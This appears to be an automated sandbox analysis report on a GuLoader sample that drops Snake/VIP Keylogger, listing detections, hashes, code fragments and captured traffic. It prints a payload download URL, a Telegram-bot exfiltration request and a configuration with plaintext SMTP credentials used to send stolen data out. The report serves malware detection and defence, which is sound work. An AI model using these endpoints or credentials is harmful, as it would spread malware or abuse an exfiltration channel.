Windows Analysis Report
Shave.exe

Overview

General Information

Sample name: Shave.exe
Analysis ID: 1562047
MD5: 51000c141b602569cf44b0f8bec9ecb8
SHA1: d7b819dbc26b3e66c99d233c5c7fc86492e626dd
SHA256: 5b19a26d6e86bbcd6d454baee6ae7c77f1c4ca6017ad965eb79098308346f383
Tags: exeGuLoaderuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mukesh@cipmach.com", "Password": "mail@2019$", "Host": "mail.cipmach.com", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: Shave.exe Virustotal: Detection: 45% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Shave.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Shave.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49771 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
Source: Shave.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00402868 FindFirstFileW, 3_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004065DA FindFirstFileW,FindClose, 3_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 3_2_004059A9
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015F45Dh 3_2_0015F2C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015F45Dh 3_2_0015F4AC
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015F45Dh 3_2_0015F52F
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015FC19h 3_2_0015F974
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0ECA6h 3_2_04B0E9D8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B09280h 3_2_04B08FB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B07EB5h 3_2_04B07B78
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0E386h 3_2_04B0E0B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B00741h 3_2_04B00498
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then mov esp, ebp 3_2_04B0B081
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B06733h 3_2_04B06488
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B00B99h 3_2_04B008F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0C396h 3_2_04B0C0C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B062D9h 3_2_04B06030
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0BF06h 3_2_04B0BC38
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0DEF6h 3_2_04B0DC28
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B032B1h 3_2_04B03008
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B03709h 3_2_04B03460
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B002E9h 3_2_04B00040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B01449h 3_2_04B011A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B018A1h 3_2_04B015F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0CCB6h 3_2_04B0C9E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0C826h 3_2_04B0C558
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B00FF1h 3_2_04B00D48
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0E816h 3_2_04B0E548
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B02151h 3_2_04B01EA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0F5C6h 3_2_04B0F2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B05179h 3_2_04B04ED0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B07571h 3_2_04B072C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B048C9h 3_2_04B04620
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B06CC1h 3_2_04B06A18
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B07119h 3_2_04B06E70
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B04D21h 3_2_04B04A78
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0D146h 3_2_04B0CE78
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0F136h 3_2_04B0EE68
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B01CF9h 3_2_04B01A50
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B02E59h 3_2_04B02BB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0BA76h 3_2_04B0B7A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0DA66h 3_2_04B0D798
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B05A29h 3_2_04B05780
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0FA56h 3_2_04B0F788
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B05E81h 3_2_04B05BD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B079C9h 3_2_04B07720
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B055D1h 3_2_04B05328
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0B5E6h 3_2_04B0B318
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B025A9h 3_2_04B02300
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0D5D6h 3_2_04B0D308
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B02A01h 3_2_04B02758
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B36970h 3_2_04B36678
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B36347h 3_2_04B35FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3FDA8h 3_2_04B3FAB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B35986h 3_2_04B356B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38FB0h 3_2_04B38CB8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3A798h 3_2_04B3A4A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3154Eh 3_2_04B31280
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B32756h 3_2_04B32488
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3BF80h 3_2_04B3BC88
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3B5F0h 3_2_04B3B2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3CDD8h 3_2_04B3CAE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3079Eh 3_2_04B304D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B377C8h 3_2_04B374D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33996h 3_2_04B336C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3E5C0h 3_2_04B3E2C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3B128h 3_2_04B3AE30
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33506h 3_2_04B33238
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B354F6h 3_2_04B35228
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3C910h 3_2_04B3C618
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3E0F8h 3_2_04B3DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B37300h 3_2_04B37008
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3D768h 3_2_04B3D470
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B34746h 3_2_04B34478
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38158h 3_2_04B37E60
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3EF50h 3_2_04B3EC58
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3030Eh 3_2_04B30040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B39940h 3_2_04B39648
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B31E47h 3_2_04B31BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33076h 3_2_04B32DA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3D2A0h 3_2_04B3CFA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3EA88h 3_2_04B3E790
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B35066h 3_2_04B34D98
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B37C90h 3_2_04B37998
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B39478h 3_2_04B39180
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B310BEh 3_2_04B30DF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38AE8h 3_2_04B387F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B322C6h 3_2_04B31FF8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B342B6h 3_2_04B33FE8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3F8E0h 3_2_04B3F5E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3A2D0h 3_2_04B39FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3BAB8h 3_2_04B3B7C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3DC30h 3_2_04B3D938
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3F418h 3_2_04B3F120
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38620h 3_2_04B38328
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B319DEh 3_2_04B31710
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B39E08h 3_2_04B39B10
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B32BE6h 3_2_04B32918
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B34BD7h 3_2_04B34908
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B30C2Eh 3_2_04B30960
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3AC60h 3_2_04B3A968
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3C448h 3_2_04B3C150
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33E26h 3_2_04B33B58
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B36E38h 3_2_04B36B40
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B35E16h 3_2_04B35B48
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41FE8h 3_2_04E41CF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41190h 3_2_04E40E98
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E40338h 3_2_04E40040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41B20h 3_2_04E41828
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E40CC8h 3_2_04E409D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41658h 3_2_04E41360
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E40801h 3_2_04E40508
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then push 00000000h 3_2_379F50C7
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_379F0A10
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_379F0A01
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_379F0D26
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 38312C19h 3_2_38312968
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831DC51h 3_2_3831D9A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 383131E0h 3_2_38312DC8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831E0A9h 3_2_3831DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831FAB9h 3_2_3831F810
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_38310040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831CF49h 3_2_3831CCA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831D3A1h 3_2_3831D0F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 383131E0h 3_2_3831310E
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831D7F9h 3_2_3831D550
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 383131E0h 3_2_38312DC2
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831E501h 3_2_3831E258
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831E959h 3_2_3831E6B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 38310D0Dh 3_2_38310B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 38311697h 3_2_38310B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831EDB1h 3_2_3831EB08
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831F209h 3_2_3831EF60
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831F661h 3_2_3831F3B8

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49886 -> 199.79.63.24:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 185.244.144.68 185.244.144.68
Source: Joe Sandbox View IP Address: 193.122.130.0 193.122.130.0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49751 -> 185.244.144.68:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49779 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49757 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49777 -> 172.67.177.134:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.5:49886 -> 199.79.63.24:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /oxzGOftLtQcGlWZ214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49771 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /oxzGOftLtQcGlWZ214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: mertvinc.com.tr
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.cipmach.com
